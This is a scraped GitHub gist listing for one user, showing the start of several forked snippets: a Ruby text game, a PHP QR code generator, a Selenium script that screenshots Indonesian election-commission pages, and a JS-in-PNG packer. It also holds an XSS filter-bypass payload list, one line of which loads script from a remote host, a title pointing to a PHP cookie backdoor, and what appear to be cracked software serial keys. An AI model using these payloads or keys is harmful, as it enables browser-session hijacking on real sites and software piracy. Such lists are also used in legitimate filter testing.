Skip to content

Instantly share code, notes, and snippets.

View kevinmel2000's full-sized avatar
🎮
Game Dev

Teddy Zugana kevinmel2000

🎮
Game Dev
View GitHub Profile
@kevinmel2000
kevinmel2000 / PHP-cookie-backdoor.php
Created February 27, 2023 05:10 — forked from jonaslejon/PHP-cookie-backdoor.php
This is a PHP COOKIE backdoor that was found during a forensic investigation
@kevinmel2000
kevinmel2000 / xxsfilterbypass.lst
Created May 10, 2021 02:06 — forked from rvrsh3ll/xxsfilterbypass.lst
XSS Filter Bypass List
';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
'';!--"<XSS>=&{()}
0\"autofocus/onfocus=alert(1)--><video/poster/onerror=prompt(2)>"-confirm(3)-"
<script/src=data:,alert()>
<marquee/onstart=alert()>
<video/poster/onerror=alert()>
<isindex/autofocus/onfocus=alert()>
<SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT>
<IMG SRC="javascript:alert('XSS');">
<IMG SRC=javascript:alert('XSS')>
[
{
"author": "Andina Librianty",
"title": "Galaxy Note 20 Ultra LTE Muncul di Geekbench - Liputan6.com",
"description": "Samsung sedang menyiapkan seri flagship Galaxy Note 20. Informasi tentang smartphone tersebut juga sudah banyak beredar di ranah internet.",
"url": "https://www.liputan6.com/tekno/read/4323034/galaxy-note-20-ultra-lte-muncul-di-geekbench",
"urlToImage": "https://cdn0-production-images-kly.akamaized.net/kwYrjSBiS30aiuWq0gxsB1szMC4=/0x0:0x0/673x379/filters:quality(75):strip_icc():format(jpeg):watermark(kly-media-production/assets/images/watermarks/liputan6/watermark-gray-landscape-new.png,573,20,0)/kly-media-production/medias/3113243/original/050107700_1587977893-IMG_20200427_154636-01.jpeg",
"publishedAt": "2020-08-05T08:30:05Z",
"content": "Liputan6.com, JakartaSamsung sedang menyiapkan seri flagship Galaxy Note 20. Informasi tentang smartphone tersebut juga sudah banyak beredar di ranah internet.\r\nDilansir GSM Arena, Rabu (5/8/2020), b… [+571 chars]"
},
@kevinmel2000
kevinmel2000 / leisure_suit_larry
Created January 12, 2020 10:45 — forked from aguayma/leisure_suit_larry
Leisure Suit Larry
puts "Hey Larry! That's your name right?"
you_Larry = gets.chomp
if "Yes".downcase
puts "I knew you were!! I would recognize that cheap suit anywhere"
else
puts "Listen here you dirty ba&^$^. You're Larry and theres nothing you can do about it!!"
end
puts <<END
@kevinmel2000
kevinmel2000 / QRLogo.php
Created July 3, 2019 09:41 — forked from NTICompass/QRLogo.php
QR Code + Logo Generator
<?php
/**
* QR Code + Logo Generator
*
* http://labs.nticompassinc.com
*/
$data = isset($_GET['data']) ? $_GET['data'] : 'http://labs.nticompassinc.com';
$size = isset($_GET['size']) ? $_GET['size'] : '200x200';
$logo = isset($_GET['logo']) ? $_GET['logo'] : FALSE;
@kevinmel2000
kevinmel2000 / save_screenshot_with_select.py
Created May 17, 2019 06:21 — forked from lantip/save_screenshot_with_select.py
Script untuk menyimpan tangkap-layar dari laman KPU, dengan terlebih dulu memilih TPS
# Sebagai kelanjutan dari script saya sebelumnya (save_screenshot.py)
# Script ini membuka laman kpu, memilih berurutan Propinsi, Kabupaten, Kecamatan, Kelurahan dan TPS
# Di penghujung proses, dilakukan penyimpanan screenshot.
# Sebagai POC, saya batasi saja 5 TPS
from selenium import webdriver
from selenium.webdriver.common.by import By
from selenium.webdriver.support.ui import WebDriverWait
from selenium.webdriver.support import expected_conditions as EC
from datetime import datetime
import time
Name: Flash
Serial: eNrzzU/OLi0odswsqnHLSSzOqDGoca7JKCkpsNLXLy8v1ytJTczVLUotKNFLzs8FAJHYETc=
if anyone wants to thank ETH: 0x527c2aB55b744D6167dc981576318af96ed26676
Thank you!
Organization name: leexij@gmail.com
Serial Key: eNrzzU/OLi0odswsqslJTa3IzHJIz03MzNFLzs+tMTQyNrcwsTQyAIEa5xpDAIFxDy8k
#!/bin/bash
modprobe -r ec_sys
modprobe ec_sys write_support=1
on="\x8a"
off="\x0a"
led(){
echo -n -e $1 | dd of="/sys/kernel/debug/ec/ec0/io" bs=1 seek=12 count=1 conv=notrunc 2> /dev/null
@kevinmel2000
kevinmel2000 / pnginator.rb
Created December 4, 2018 10:09 — forked from drubicza/pnginator.rb
pnginator: pack Javascript into a self-extracting PNG
#!/usr/bin/env ruby -w
# pnginator.rb: pack a .js file into a PNG image with an HTML payload;
# when saved with an .html extension and opened in a browser, the HTML extracts and executes
# the javascript.
# Usage: ruby pnginator.rb input.js output.png.html
# By Gasman <http://matt.west.co.tt/>
# from an original idea by Daeken: http://daeken.com/superpacking-js-demos